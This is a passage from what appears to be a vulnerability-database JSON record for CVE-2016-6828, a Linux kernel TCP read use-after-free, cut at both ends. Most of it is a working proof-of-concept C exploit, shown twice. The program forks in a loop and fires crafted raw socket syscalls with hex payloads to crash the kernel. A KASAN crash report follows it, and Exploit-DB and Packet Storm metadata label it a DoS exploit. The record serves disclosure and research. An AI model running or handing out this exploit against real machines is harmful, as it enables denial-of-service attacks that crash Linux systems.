7\\xe9\\xd3\\x81\\x15\\x34\\x63\\x63\\x14\\xb7\\x1a\\x43\\x9b\\x4f\\x85\\xfa\\x88\\x5c\\xe1\\x1e\\xce\\x87\\x95\\xe1\\x81\\xc8\\x06\\xaf\\x1a\\x64\\x26\\x36\\x83\\x36\\xef\\x71\\x0c\\x2a\\xda\\xe4\\xff\\xa1\\x87\\xc2\\x04\\x96\\x1c\\x72\\xd9\\x2d\\xf0\\xce\\x46\\xd4\\x3a\\xd1\\xc7\\x2f\\x60\\x25\\xf8\\x33\\x1f\\x38\\x7a\\x46\\xb1\\x43\\xa4\\xd2\\x65\\x77\\x47\\x85\\xe9\\xad\\x52\\xdb\\x8b\\x93\\x23\\xf1\\xf9\\xa9\\x5f\\xe4\\xf8\\x39\\x82\\xc5\\xb4\\xe1\\x5b\\x87\\xa0\\xfd\\x2c\\xc2\\x84\\x15\\x78\\xaa\\x9b\\x3f\\xe5\\x75\\x6e\\x05\\xef\\x84\\x4c\\x6b\\x9d\\x1d\\x9e\\x7c\\x92\\x3b\\x55\\xcb\\x01\\x6f\\xc5\\x9a\\xd8\\xc3\\x91\\x39\\x95\\xd7\\x8f\\xe9\\x87\\x15\\x27\\xe7\\x19\\xa8\\x18\\x24\\xfd\\x09\\x11\\x49\\x41\\xc6\\xd2\\xe9\\x1a\\xf4\\xb0\\x9b\\x85\\x9b\\x3f\\xb1\\xf3\\xc3\\x48\\xc5\\xe7\\x45\\x0b\\x21\\x2d\\x32\\x27\\x92\\x3c\\x39\\x52\\x0f\\x2b\\xdf\\x52\\x66\\x6f\\x01\\x8f\\xdc\\xfa\\x8f\\x5e\\x53\\xb7\\x82\\x23\\x79\\xfa\\x28\\xe5\\x24\\xa7\\x5e\\x2a\\x24\\x7e\\xd0\\x1e\\xd5\\x1a\\xb6\\xb8\\xe5\\xb2\\x6d\\x4d\\x38\\x61\\x79\\xb8\\xd1\\x27\\x92\\x63\\x0c\\xed\\x3c\\xf1\\x13\\x98\\x37\\xfa\\x98\\xda\\x0c\\x1a\\x86\\xd1\\x6a\\x12\\x86\\x2f\\xd0\\x8d\\x8e\\x2e\\x52\\x23\\xac\\x2d\\x82\\x59\\xef\\x17\\xbc\\xf1\\x47\\xfb\\xf0\\x5f\\x43\\x70\\x99\\x14\\xdf\\xaf\\x44\\x02\\xb5\\xe9\\x39\\x51\\x8e\\xf2\\x07\\x9c\\xa2\\x39\\xab\\x07\\xa2\\x22\\xa7\\xd3\\x5c\\xc0\\x8c\\xcf\\x3c\\xa2\\xa7\\xd0\\xd6\\xf4\\x82\\xcc\\x35\\x75\\x3a\\x20\\xb7\\x9b\\xf3\\x9d\\xd9\\xfe\\xdf\\x1e\\x3f\\x55\\xf2\\x99\\xdb\\xd0\\xb2\\xd7\\x86\\xc1\\xfa\\xb3\\xc7\\x99\\xdc\\x02\\xe3\\x9f\\xfd\\x1e\\x56\\xc1\\xf2\\x51\\x32\\x84\\x61\\x30\\x33\\xf6\\xe3\\x82\\x9f\\xf2\\x04\\xaf\\x5d\\xf4\\x3d\\xa6\\x0e\\x25\\x53\\xe9\\x05\\x7c\\x42\\xbf\\xfa\\x97\\xd7\\x77\\x8c\\x8f\\x29\\x7a\\xcb\\x40\\x13\\x07\\xb5\\x8d\\x69\\xdc\\x8b\\x35\\xd3\\xb6\\xf3\\xd8\\x07\\x94\\x7e\\x69\\x0f\\xb7\\x28\\xf1\\xb3\\x45\\x60\\x37\\x65\\xa4\\xf6\\xbf\\x9c\\xb3\\xf9\\x3d\\xe1\\x08\\x08\\xc9\\x76\\x5e\\x8b\\x7f\\x26\\x01\\x9d\\x8f\\x15\\x39\\x02\\xfe\\x8a\\xe3\\x3b\\x8b\\xf9\\xae\\x06\\x04\\xef\\x0d\\xcf\\x67\\x24\\x54\\xe6\\x4c\\xe4\\x05\\x8e\\xd7\\xda\\x4c\\xf2\\xd7\\x88\\x75\\x87\\xf7\\x7e\\xd0\\x49\\x19\\x02\\x5e\\x00\\xc4\\xeb\\x3e\\xec\\x70\\x35\\x9c\\x9b\\xc9\\xd9\\x47\\x65\\x4c\\xa3\\xdb\\x0e\\xde\\x1e\\x76\\x58\\x27\\xe0\\x91\\x6b\\xf9\\x25\\x44\\xa6\\xa2\\x85\\x8f\\x50\\xd0\\x13\\x88\\x57\\x25\\x56\\x78\\xed\\xcb\\x6b\\xec\\xf2\\x4f\\xd4\\xce\\xf1\\x90\\xcd\\x49\\x50\\xb5\\xcf\\xd3\\x96\\x4d\\x3c\\xf4\\x54\\x8e\\xa9\\xdb\\xd3\\xb5\\x9e\\xe9\\x87\\x19\\x8b\\x59\\xd7\\xf2\\xcf\\x1a\\xd3\\x70\\xca\\x42\\xc6\\x97\\x66\\x38\\x24\\x39\\x4d\\x42\\xa1\\xf0\\x24\\x46\\xe4\\x0e\\x9c\\xbc\\xc4\\x53\\xa9\\xb9\\x94\\x4d\\xca\\x48\\xa6\\x04\\xb8\\x2f\\x4f\\xf5\\x85\\x32\\x22\\xf8\\x4e\\x83\\xab\\x34\\x27\\x3b\\x8f\\x24\\x48\\x15\\x9b\\xa9\\xf8\\xb9\\xb7\\xcb\\xd5\\xfb\\x72\\xec\\x7a\\xc3\\x39\\x9c\\xde\\x25\\x76\\x08\\x3f\\x49\\x35\\xbd\\x42\\x4f\\x3f\\x5e\\xfc\\x6b\\x6b\\x9e\\x3e\\x34\\x47\\x62\\xed\\x5a\\xae\\xdc\\xcf\\x4e\\xe6\\x18\\xfa\\x7f\\xe6\\x46\\xc8\\xbe\\xbc\\x42\\x88\\xb6\\xfe\\xbd\\x96\\x85\\x5a\\x4a\\x1d\\xd2\\x00\\xe9\\x71\\x48\\x48\\x52\\xd6\\xf5\\x88\\x7d\\x94\\x18\\xf6\\xf0\\x5c\\x0a\\x39\\x29\\xc8\\x78\\xa0\\xa8\\x44\\xf4\\xb6\\xca\\x78\\x75\\x4a\\xf7\\x53\\xd7\\x7e\\x23\\xaf\\x6b\\xf9\\xcd\\x77\\xb2\\xd0\\x37\\x29\\x9c\\x57\\xbe\\x9e\\x5f\\x7c\\xe4\\x41\\x59\\xde\\xd5\\x63\\x02\\x2a\\xc0\\x74\\xa6\\x00\\xe2\\x8f\\x83\\x30\\xc1\\x60\\xcd\\xb3\\xca\\x44\\x1d\\x88\\x54\\x8b\\xbc\\xa8\\x79\\x78\\x86\\xa2\\x49\\x7c\\x94\\x49\\xf3\\xb4\\x41\\x44\\x76\\x33\\xf1\\x2e\\x71\\xbc\\xa1\\x39\\xb9\\x68\\x56\\xd9\\xa0\\xa1\\x6f\\xdc\\x7d\\xa3\\xb8\\x4f\\x1c\\xb8\\x19\\x26\\x42\\x88\\x0e\\xcb\\xbb\\xc9\\x6c\\xa8\\xf8\\xe9\\x37\\x86\\x61\\x37\\x9f\\xba\\xb3\\x9e\\x54\\x07\\xe6\\xff\\x6f\\x54\\x8c\\xcf\\x7e\\x3d\\x14\\xfd\\x94\\xbb\\xdc\\x59\\x5d\\x22\\x86\\xb5\\x3b\\x18\\x0d\\x08\\xad\\x15\\x67\\x6b\\xf1\\xc8\\xd8\\x81\\xac\\x14\\x63\\xcf\\x1e\\xf9\\x48\\xba\\xe0\\x33\\x4c\\x1e\\x72\\xe9\\x00\\x1a\\x48\\xc5\\xb4\\x2c\\x71\\xd6\\x7a\\x0b\\x8f\\x6c\\x02\\x9a\\x02\\xa9\\x20\\xbd\\x8a \nr[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul); \nr[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \n*(uint32_t*)0x20022fdd = (uint32_t)0x28; \n*(uint32_t*)0x20022fe1 = (uint32_t)0x400; \n*(uint64_t*)0x20022fe5 = (uint64_t)0x0; \n*(uint64_t*)0x20022fed = (uint64_t)0x8ab; \n*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb; \n*(uint16_t*)0x20022ffd = (uint16_t)0x5; \nr[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0); \n} else if (pid > 0) { \nint returnStatus; \nwaitpid(pid, &returnStatus, 0); \nprintf(\"collected child\\n\"); \n} else { \nprintf(\"fork failed\\n\"); \nexit(1); \n} \n} \nreturn 0; \n} \n \n \n// KASAN report on v4.8-rc1, equivalent on master \n \n/* \n[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428 \n[ 21.447953] Read of size 4 by task rsyslogd/1612 \n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1 \n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 \n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151 \n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400 \n[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400 \n[ 21.452873] Call Trace: \n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2 \n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70 \n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500 \n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70 \n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0 \n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0 \n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120 \n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0 \n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0 \n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0 \n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0 \n[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20 \n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0 \n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210 \n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0 \n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0 \n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50 \n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0 \n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240 \n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0 \n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0 \n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120 \n[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410 \n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0 \n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550 \n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0 \n[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0 \n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50 \n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0 \n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90 \n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50 \n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0 \n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0 \n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340 \n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750 \n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 \n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20 \n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50 \n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500 \n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 \n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0 \n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0 \n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120 \n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280 \n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350 \n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420 \n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40 \n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0 \n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170 \n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580 \n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0 \n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0 \n[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20 \n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110 \n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30 \n[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340 \n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d \n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140 \n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0 \n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90 \n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424 \n[ 21.494277] Allocated: \n[ 21.494538] PID = 1711 \n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 \n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 \n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0 \n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20 \n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0 \n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0 \n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790 \n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10 \n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 \n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 \n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 \n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 \n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 \n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 \n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 \n[ 21.504144] Freed: \n[ 21.504368] PID = 1711 \n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 \n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 \n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0 \n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210 \n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0 \n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30 \n[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10 \n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 \n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 \n[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 \n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 \n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 \n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 \n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 \n[ 21.513258] Memory state around the buggy address: \n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc \n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.516114] ^ \n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.518203] ================================================================== \n*/ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139642/linuxkerneltcp-uaf.txt", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-09T10:57:12", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Linux Kernel - TCP Related Read Use-After-Free. CVE-2016-6828. Dos exploit for Linux platform", "reporter": "Exploit-DB", "published": "2016-08-18T00:00:00", "type": "exploitdb", "title": "Linux Kernel - TCP Related Read Use-After-Free", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2016-08-18T00:00:00", "id": "EDB-ID:40731", "href": "https://www.exploit-db.com/exploits/40731/", "sourceData": "// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html\r\n\r\n// to build clang derp4.c -o derp4 -static\r\n\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n\r\n#ifndef SYS_mmap\r\n#define SYS_mmap 9\r\n#endif\r\n#ifndef SYS_socket\r\n#define SYS_socket 41\r\n#endif\r\n#ifndef SYS_bind\r\n#define SYS_bind 49\r\n#endif\r\n#ifndef SYS_sendto\r\n#define SYS_sendto 44\r\n#endif\r\n#ifndef SYS_setsockopt\r\n#define SYS_setsockopt 54\r\n#endif\r\n#ifndef SYS_dup\r\n#define SYS_dup 32\r\n#endif\r\n#ifndef SYS_sendmsg\r\n#define SYS_sendmsg 46\r\n#endif\r\n#ifndef SYS_recvfrom\r\n#define SYS_recvfrom 45\r\n#endif\r\n#ifndef SYS_write\r\n#define SYS_write 1\r\n#endif\r\n\r\nlong r[62];\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n while (1) {\r\n pid_t pid = fork();\r\n\r\n if (pid == 0) {\r\n r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);\r\n memcpy((void*)0x20006000, \"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128);\r\n r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);\r\n r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n memcpy((void*)0x20012f5a, \"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165);\r\n memcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28);\r\n r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);\r\n *(uint32_t*)0x20001fff = (uint32_t)0x2;\r\n r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);\r\n r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);\r\n *(uint32_t*)0x20018000 = (uint32_t)0x4;\r\n r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);\r\n *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;\r\n *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;\r\n *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;\r\n *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;\r\n *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;\r\n *(uint64_t*)0x2000dff0 = (uint64_t)0x0;\r\n *(uint32_t*)0x2000dff8 = (uint32_t)0x4;\r\n *(uint16_t*)0x2000e000 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000e002 = (uint16_t)0x0;\r\n *(uint32_t*)0x2000e004 = (uint32_t)0xffff;\r\n *(uint32_t*)0x2000e008 = (uint32_t)0x401;\r\n *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;\r\n *(uint64_t*)0x20000008 = (uint64_t)0x37;\r\n *(uint32_t*)0x2000ed3a = (uint32_t)0x14;\r\n *(uint16_t*)0x2000ed3e = (uint16_t)0x2;\r\n *(uint16_t*)0x2000ed40 = (uint16_t)0x12;\r\n *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;\r\n *(uint32_t*)0x2000ed46 = (uint32_t)0x7;\r\n *(uint8_t*)0x2000ed4a = (uint8_t)0x6;\r\n *(uint8_t*)0x2000ed4b = (uint8_t)0x100;\r\n *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;\r\n *(uint32_t*)0x2000ed4d = (uint32_t)0x11;\r\n *(uint16_t*)0x2000ed51 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000ed53 = (uint16_t)0x808;\r\n *(uint32_t*)0x2000ed55 = (uint32_t)0x1;\r\n *(uint32_t*)0x2000ed59 = (uint32_t)0x0;\r\n *(uint8_t*)0x2000ed5d = (uint8_t)0x0;\r\n *(uint32_t*)0x2000ed5e = (uint32_t)0x12;\r\n *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;\r\n *(uint16_t*)0x2000ed64 = (uint16_t)0x200;\r\n *(uint32_t*)0x2000ed66 = (uint32_t)0x5;\r\n *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;\r\n *(uint8_t*)0x2000ed6e = (uint8_t)0x9;\r\n *(uint8_t*)0x2000ed6f = (uint8_t)0x1;\r\n r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);\r\n *(uint16_t*)0x20001003 = (uint16_t)0x1;\r\n *(uint8_t*)0x20001005 = (uint8_t)0x0;\r\n *(uint32_t*)0x20001007 = (uint32_t)0x9;\r\n r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);\r\n memcpy((void*)0x20015285, \"\\xed\\xe0\\xf1\\x03\\xbd\\x1d\\xe2\\x8d\\x13\\x62\\xc9\\x11\\xde\\x3b\\x55\\xb1\\xb2\\x26\\x95\\xb2\\x3f\\x32\\x96\\x8a\\x3d\\xf7\\xd4\\x2c\\xd9\\x32\\xae\\x05\\x9a\\x60\\x09\\xbc\\x49\\x63\\x6a\\x45\\xd5\\x6f\\xa8\\x4b\\xaf\\x8a\\x66\\xf3\\x35\\xad\\xe6\\x68\\x85\\xd4\\x7e\\xe5\\x7c\\x7e\\x06\\xbf\\x32\\xfb\\xf9\\xd2\\x9f\\x40\\xa3\\x0a\\xa0\\x93\\x09\\x73\\x39\\x7d\\xac\\x3c\\x8d\\x83\\xe0\\x0c\\x5e\\xa2\\x36\\x9b\\x9c\\xb4\\x62\\xe8\\x39\\x07\\xd8\\x71\\xc1\\x2f\\x6f\\x18\\xfa\\x8a\\x5d\\x06\\xb4\\x46\\xa2\\x97\\x79\\x81\\xb2\\x85\\xd4\\x4f\\x6b\\x48\\xc4\\xf5\\xdd\\xa8\\x8d\\x10\\x74\\x01\\xe1\\x58\\xb2\\x82\\x72\\xc4\\xb6\\xb2\\xf7\\xaa\\x90\\x9c\\x9f\\x61\\x95\\x87\\x7b\\x99\\xc5\\xa5\\x53\\xbc\\xab\\xdb\\xdb\\x5e\\x32\\xb8\\xc3\\xee\\xd3\\xda\\x7a\\xf2\\x5c\\xc5\\x1a\\xf1\\xd6\\x1b\\x53\\xad\\x24\\xd0\\xa0\\xc0\\x0d\\x73\\x9e\\x81\\x7e\\x4e\\x82\\xf5\\xa9\\x73\\x3c\\x7a\\x5c\\x6e\\x4c\\x48\\x7d\\x42\\xf5\\x2f\\x68\\xf9\\x7e\\xa9\\xd8\\x6a\\x64\\x78\\x08\\x7a\\x37\\xe9\\xd3\\x81\\x15\\x34\\x63\\x63\\x14\\xb7\\x1a\\x43\\x9b\\x4f\\x85\\xfa\\x88\\x5c\\xe1\\x1e\\xce\\x87\\x95\\xe1\\x81\\xc8\\x06\\xaf\\x1a\\x64\\x26\\x36\\x83\\x36\\xef\\x71\\x0c\\x2a\\xda\\xe4\\xff\\xa1\\x87\\xc2\\x04\\x96\\x1c\\x72\\xd9\\x2d\\xf0\\xce\\x46\\xd4\\x3a\\xd1\\xc7\\x2f\\x60\\x25\\xf8\\x33\\x1f\\x38\\x7a\\x46\\xb1\\x43\\xa4\\xd2\\x65\\x77\\x47\\x85\\xe9\\xad\\x52\\xdb\\x8b\\x93\\x23\\xf1\\xf9\\xa9\\x5f\\xe4\\xf8\\x39\\x82\\xc5\\xb4\\xe1\\x5b\\x87\\xa0\\xfd\\x2c\\xc2\\x84\\x15\\x78\\xaa\\x9b\\x3f\\xe5\\x75\\x6e\\x05\\xef\\x84\\x4c\\x6b\\x9d\\x1d\\x9e\\x7c\\x92\\x3b\\x55\\xcb\\x01\\x6f\\xc5\\x9a\\xd8\\xc3\\x91\\x39\\x95\\xd7\\x8f\\xe9\\x87\\x15\\x27\\xe7\\x19\\xa8\\x18\\x24\\xfd\\x09\\x11\\x49\\x41\\x